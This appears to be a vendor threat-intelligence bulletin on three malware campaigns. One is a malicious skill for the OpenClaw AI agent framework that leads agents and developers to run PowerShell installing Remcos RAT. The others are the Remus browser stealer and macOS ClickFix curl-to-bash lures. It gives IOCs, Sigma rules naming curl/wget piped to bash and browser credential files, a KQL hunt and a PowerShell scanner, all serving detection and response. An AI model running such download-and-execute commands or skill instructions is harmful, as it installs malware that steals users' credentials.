Threat Summary
Recent OTX pulses indicate a surge in diverse, high-evasion active campaigns targeting both Windows and macOS ecosystems. The intelligence highlights three distinct but operationally sophisticated threats:
-
OpenClaw/Remcos Campaign: Threat actors have weaponized the OpenClaw AI agent framework by publishing a malicious "DeepSeek-Claw" skill. This supply-chain style attack tricks developers and AI agents into executing PowerShell commands that download a malicious MSI package. The package sideloads the Remcos RAT and GhostLoader using a legitimate, signed GoToMeeting executable to bypass security controls.
-
Remus Stealer Evolution: Emerging as a successor to the doxxed Lumma Stealer, Remus is a 64-bit info-stealer specifically designed to bypass Application-Bound Encryption (ABE) in modern browsers. It utilizes advanced injection techniques and potentially Ethereum blockchain-based C2 infrastructure to siphon credentials and cryptocurrency wallet data directly from memory or storage.
-
macOS ClickFix Surge: A social engineering campaign dubbed "ClickFix" is targeting macOS users. Attackers pose as troubleshooting guides on blogs, hosting malicious Terminal commands that download infostealers like Macsync, Shub Stealer, AMOS, and PhantomPulse.
Collectively, these campaigns demonstrate a shift toward abusing legitimate developer tools (AI frameworks) and signed binaries, combined with highly specific OS-level bypasses.
Threat Actor / Malware Profile
Remcos RAT & GhostLoader
- Distribution: Malicious "DeepSeek-Claw" skill on the OpenClaw framework.
- Attack Chain: PowerShell execution -> Download MSI -> Sideload malicious DLL via signed GoToMeeting binary.
- Behavior: Remote Access Trojan (RAT) capabilities, data exfiltration, and persistence.
- Persistence: Likely established via Registry Run keys or Scheduled Tasks (common for Remcos).
- Anti-Analysis: Uses signed binary proxy execution to evade signature detection.
Remus Stealer
- Distribution: Likely via cracked software or fraudulent updates (continuing Lumma's legacy).
- Behavior: Steals browser cookies, passwords, and wallets. Bypasses Chrome/Edge Application-Bound Encryption.
- C2 Communication: Potential usage of EtherHiding or standard HTTP/HTTPS to specific IP ranges.
- Anti-Analysis: evolved codebase to counter detection following the doxxing of Lumma developers.
macOS ClickFix (Macsync/AMOS)
- Distribution: Fake troubleshooting blogs/forums.
- Attack Chain: User copies Terminal command ->
curl/wgetpayload -> Pipe to Bash/Python -> Download Infostealer. - Behavior: Exfiltrates keychain data, browser cookies, and system info.
IOC Analysis
The provided indicators of compromise (IOCs) span multiple vectors, requiring a layered operational approach:
- Domains (e.g.,
dropras.xyz,jihiz.com): These act as initial download vectors (C2/Drop sites). SOC teams should block these at the DNS layer and inspect historical DNS logs for resolution. - IPv4 Addresses (e.g.,
217.156.122.57): Hosted infrastructure likely hosting the payloads or C2 servers. These should be blocked on perimeter firewalls. - File Hashes (MD5/SHA1): Associated with the malicious MSI package and the sideloaded payloads. EDR tools should be configured to alert on execution or presence of these hashes.
Operational Guidance:
- Siem/EDR: Ingest IOCs into threat intelligence platforms (TIPs) and automate blocking rules.
- Network: Block the listed IPs and Domains at the proxy and firewall level.
Detection Engineering
Sigma Rules
YAML
title: Potential Remcos RAT Download via PowerShell MSI
id: 4b0e5d9e-8a3c-4b1f-9c2d-3e5f6a7b8c9d
description: Detects PowerShell commands downloading MSI files, associated with the OpenClaw Remcos campaign involving GoToMeeting sideloading.
status: experimental
author: Security Arsenal
date: 2026/05/10
references:
- https://www.zscaler.com/blogs/security-research/malicious-openclaw-skill-distributes-remcos-rat-and-ghostloader
logsource:
category: process_creation
product: windows
detection:
selection_pwsh:
Image|endswith: '\powershell.exe'
CommandLine|contains: 'Invoke-WebRequest'
selection_msi:
CommandLine|contains: '.msi'
filter_legit:
ParentImage|contains: '\Program Files\'
condition: selection_pwsh and selection_msi and not filter_legit
falsepositives:
- Administrative software installation
level: high
tags:
- attack.initial_access
- attack.t1204
---
title: macOS ClickFix Terminal Command Execution
id: 1a2b3c4d-5e6f-7a8b-9c0d-1e2f3a4b5c6d
description: Detects suspicious Terminal commands piping curl/wget to bash, common in macOS ClickFix campaigns delivering infostealers.
status: experimental
author: Security Arsenal
date: 2026/05/10
references:
- https://www.microsoft.com/en-us/security/blog/2026/05/06/clickfix-campaign-uses-fake-macos-utilities-lures-deliver-infostealers/
logsource:
category: process_creation
product: macos
detection:
selection_shell:
Image|endswith: '/bin/bash'
ParentImage|endswith: '/Terminal'
selection_download:
CommandLine|contains:
- 'curl '
- 'wget '
selection_pipe:
CommandLine|contains: ' | '
condition: selection_shell and selection_download and selection_pipe
falsepositives:
- Legitimate developer script execution
level: medium
tags:
- attack.execution
- attack.t1059.004
---
title: Remus Stealer Browser Credential Access
id: 9f8e7d6c-5b4a-3c2d-1e0f-9a8b7c6d5e4f
description: Detects suspicious process access to browser Login Data files, indicative of Remus Stealer or Lumma variants attempting to bypass encryption.
status: experimental
author: Security Arsenal
date: 2026/05/10
references:
- https://cyberpress.org/remus-bypasses-browser-encryption/
logsource:
category: file_access
product: windows
detection:
selection_target:
TargetFilename|contains:
- '\Google\Chrome\User Data\Default\Login Data'
- '\Google\Chrome\User Data\Local State'
- '\Microsoft\Edge\User Data\Default\Login Data'
- '\BraveSoftware\Brave-Browser\User Data\Default\Login Data'
filter_browser:
Image|endswith:
- '\chrome.exe'
- '\msedge.exe'
- '\brave.exe'
condition: selection_target and not filter_browser
falsepositives:
- Backup software or security scanners
level: high
tags:
- attack.credential_access
- attack.t1005
KQL (Microsoft Sentinel)
KQL — Microsoft Sentinel / Defender
// Hunt for network connections to known Remus/Lumma C2 IPs and OpenClaw domains
let IoC_IPs = dynamic(["45.94.47.204", "217.156.122.57", "217.156.122.75", "217.156.122.12", "45.151.106.110"]);
let IoC_Domains = dynamic(["jihiz.com", "kayeart.com", "bintail.com", "wusetail.com", "dropras.xyz", "trackpipe.dev"]);
DeviceNetworkEvents
| where RemoteIP in (IoC_IPs) or RemoteUrl has_any (IoC_Domains)
| project Timestamp, DeviceName, InitiatingProcessAccountName, InitiatingProcessCommandLine, RemoteIP, RemoteUrl
| extend Timestamp = format_datetime(Timestamp, 'yyyy-MM-dd HH:mm:ss')
PowerShell Hunt Script
PowerShell
<#
.SYNOPSIS
IOC Hunter for Remcos RAT and Remus Stealer
.DESCRIPTION
Checks for file hashes associated with the OpenClaw campaign and network connections to Remus C2 infrastructure.
#>
$TargetHashes = @(
"1c267cab0a800a7b2d598bc1b112d5ce",
"2a5f619c966ef79f4586a433e3d5e7ba",
"2c4b7c8b48e6b4e5f3e8854f2abfedb5",
"82536825e700f4c863238a90dd314687",
"cc1af839a956c8e2bf8e721f5d3b7373"
)
$TargetIPs = @(
"217.156.122.57",
"217.156.122.75",
"217.156.122.12",
"45.151.106.110",
"45.94.47.204"
)
Write-Host "[+] Checking for known malicious file hashes..." -ForegroundColor Cyan
$Drives = Get-PSDrive -PSProvider FileSystem | Select-Object -ExpandProperty Root
foreach ($Drive in $Drives) {
Get-ChildItem -Path $Drive -Recurse -ErrorAction SilentlyContinue |
Where-Object { $_.Length -gt 0kb -and $_.Length -lt 50MB } |
ForEach-Object {
$Hash = (Get-FileHash -Path $_.FullName -Algorithm MD5 -ErrorAction SilentlyContinue).Hash
if ($TargetHashes -contains $Hash) {
Write-Host "[!] MALICIOUS FILE FOUND: $($_.FullName) (Hash: $Hash)" -ForegroundColor Red
}
}
}
Write-Host "[+] Checking for active network connections to known C2 IPs..." -ForegroundColor Cyan
$Connections = Get-NetTCPConnection -State Established -ErrorAction SilentlyContinue
foreach ($IP in $TargetIPs) {
$Found = $Connections | Where-Object { $_.RemoteAddress -eq $IP }
if ($Found) {
Write-Host "[!] SUSPICIOUS CONNECTION: Remote IP $IP connected on local port $($Found.LocalPort) (PID: $($Found.OwningProcess))" -ForegroundColor Red
Get-Process -Id $Found.OwningProcess | Select-Object ProcessName, Path
}
}
Response Priorities
-
Immediate:
- Block all IOCs (IPs and Domains) at the network perimeter and proxy.
- Scan endpoints for the specific MD5 hashes associated with the Remcos MSI payload.
- Identify and quarantine systems executing PowerShell scripts that download MSI files from the internet.
-
24 Hours:
- Initiate credential reset for users on devices where potential Remus/Lumma infection is detected (due to cookie/session theft).
- Review logs for "DeepSeek-Claw" or "OpenClaw" related artifacts in developer environments.
-
1 Week:
- Enforce Application Signing policies to prevent the execution of unsigned binaries (where possible) to disrupt the sideloading technique used by Remcos.
- Conduct user awareness training specifically focused on "ClickFix" social engineering tactics for macOS users.
Related Resources
Security Arsenal Incident Response Managed SOC & MDR Services AlertMonitor Threat Detection From The Dark Side Intel Hub
darkwebotx-pulsedarkweb-malwareremcos-ratremus-stealerclickfixinfostealeropenclaw
Is your security operations ready?
Get a free SOC assessment or see how AlertMonitor cuts through alert noise with automated triage.